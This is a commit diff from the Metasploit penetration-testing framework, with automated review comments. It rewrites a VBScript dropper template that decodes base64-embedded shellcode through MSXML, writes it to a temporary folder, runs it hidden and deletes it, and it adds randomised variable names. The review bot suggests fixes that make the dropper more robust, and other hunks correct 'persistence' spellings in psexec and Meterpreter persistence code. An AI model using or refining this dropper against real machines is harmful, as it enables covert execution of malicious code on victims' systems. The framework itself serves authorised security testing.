
Commit ee40c9d

Land rapid7#6625, Send base64ed shellcode and decode with certutil (Actually MSXML)
2 parents f2a608b + 2525eab commit ee40c9d


4 files changed

+27
-15
lines changed


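--- a/data/templates/scripts/to_exe.vbs.template
+++ b/data/templates/scripts/to_exe.vbs.template
@@ -1,23 +1,31 @@
-Function %{var_func}()
-%{var_shellcode} = "%{hex_shellcode}"
+Function %{var_decodefunc}(%{var_decodebase64})
+%{var_xml} = "<B64DECODE xmlns:dt="& Chr(34) & "urn:schemas-microsoft-com:datatypes" & Chr(34) & " " & _
+"dt:dt=" & Chr(34) & "bin.base64" & Chr(34) & ">" & _
+%{var_decodebase64} & "</B64DECODE>"
+Set %{var_xmldoc} = CreateObject("MSXML2.DOMDocument.3.0")
+%{var_xmldoc}.LoadXML(%{var_xml})
+%{var_decodefunc} = %{var_xmldoc}.selectsinglenode("B64DECODE").nodeTypedValue
+set %{var_xmldoc} = nothing
+End Function
 
+Function %{var_func}()
+%{var_shellcode} = "%{base64_shellcode}"
 Dim %{var_obj}
 Set %{var_obj} = CreateObject("Scripting.FileSystemObject")
-Dim %{var_stream}
 Dim %{var_tempdir}
-Dim %{var_tempexe}
 Dim %{var_basedir}
 Set %{var_tempdir} = %{var_obj}.GetSpecialFolder(2)
 %{var_basedir} = %{var_tempdir} & "\" & %{var_obj}.GetTempName()
 %{var_obj}.CreateFolder(%{var_basedir})
 %{var_tempexe} = %{var_basedir} & "\" & "%{exe_filename}"
-Set %{var_stream} = %{var_obj}.CreateTextFile(%{var_tempexe}, true , false)
-For i = 1 to Len(%{var_shellcode}) Step 2
-%{var_stream}.Write Chr(CLng("&H" & Mid(%{var_shellcode},i,2)))
-Next
-%{var_stream}.Close
 Dim %{var_shell}
 Set %{var_shell} = CreateObject("Wscript.Shell")
+%{var_decoded} = %{var_decodefunc}(%{var_shellcode})
+Set %{var_adodbstream} = CreateObject("ADODB.Stream")
+%{var_adodbstream}.Type = 1
+%{var_adodbstream}.Open
+%{var_adodbstream}.Write %{var_decoded}
+%{var_adodbstream}.SaveToFile %{var_tempexe}, 2
 %{var_shell}.run %{var_tempexe}, 0, true
 %{var_obj}.DeleteFile(%{var_tempexe})
 %{var_obj}.DeleteFolder(%{var_basedir})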
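Review bot: The ADODB.Stream created at new lines 24–28 is opened, written and saved but never closed or released, unlike the DOMDocument in the decode function, which is explicitly set to nothing at line 8; add `%{var_adodbstream}.Close` and `Set %{var_adodbstream} = Nothing` after the `SaveToFile` call. The decode function also has no failure path: the result of `LoadXML` at line 6 is discarded, so if the document is rejected, `selectsinglenode("B64DECODE")` at line 7 returns Nothing and the `.nodeTypedValue` access raises an unhandled runtime error. Separately, `Dim %{var_tempexe}` is removed while the variable is still assigned at line 20, and the new `%{var_decoded}` and `%{var_adodbstream}` are likewise undeclared, so the template now mixes explicit and implicit declaration; either restore the `Dim` lines or drop the remaining ones for consistency.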

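--- a/lib/msf/core/exploit/smb/client/psexec.rb
+++ b/lib/msf/core/exploit/smb/client/psexec.rb
@@ -164,7 +164,7 @@ def psexec(command, disconnect=true)
 if service_exists
 print_warning("Not removing service as it already existed...")
 elsif datastore['SERVICE_PERSIST']
-print_warning("Not removing service for persistance...")
+print_warning("Not removing service for persistence...")
 else
 vprint_status("Removing the service...")
 svc_status = svc_client.deleteservice(svc_handle)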

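--- a/lib/msf/util/exe.rb
+++ b/lib/msf/util/exe.rb
@@ -1266,18 +1266,22 @@ def self.to_exe_vbs(exes = '', opts = {})
 
 hash_sub = {}
 hash_sub[:exe_filename] = opts[:exe_filename] || Rex::Text.rand_text_alpha(rand(8)+8) << '.exe'
+hash_sub[:base64_filename] = Rex::Text.rand_text_alpha(rand(8)+8) << '.b64'
 hash_sub[:var_shellcode] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_fname] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_func] = Rex::Text.rand_text_alpha(rand(8)+8)
-hash_sub[:var_stream] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_obj] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_shell] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempdir] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_tempexe] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:var_basedir] = Rex::Text.rand_text_alpha(rand(8)+8)
-
-hash_sub[:hex_shellcode] = exes.unpack('H*').join('')
-
+hash_sub[:base64_shellcode] = Rex::Text.encode_base64(exes)
+hash_sub[:var_decodefunc] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_xml] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_xmldoc] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_decoded] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_adodbstream] = Rex::Text.rand_text_alpha(rand(8)+8)
+hash_sub[:var_decodebase64] = Rex::Text.rand_text_alpha(rand(8)+8)
 hash_sub[:init] = ""
 
 if persist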
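Review bot: `hash_sub[:base64_filename]` added at new line 1269 is not referenced by the rewritten to_exe.vbs.template in this commit, which only substitutes `%{base64_shellcode}`, `%{exe_filename}` and the `var_*` names, so the `.b64` key looks like a leftover from the certutil approach named in the commit title and can be dropped. The template at its new line 12 embeds `%{base64_shellcode}` inside a single VBScript string literal, so the `Rex::Text.encode_base64(exes)` call at line 1278 depends on the encoding being emitted without line breaks; a short comment there, `# must be single-line: the template embeds it in one VBScript string literal`, would make that dependency explicit. to_exe_vbs continues outside the hunk.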

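--- a/scripts/meterpreter/persistence.rb
+++ b/scripts/meterpreter/persistence.rb
@@ -228,7 +228,7 @@ def install_as_service(script_on_target)
 
 # Check for Version of Meterpreter
 wrong_meter_version(meter_type) if meter_type !~ /win32|win64/i
-print_status("Running Persistance Script")
+print_status("Running Persistence Script")
 # Create undo script
 @clean_up_rc = log_file()
 print_status("Resource file for cleanup created at #{@clean_up_rc}")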
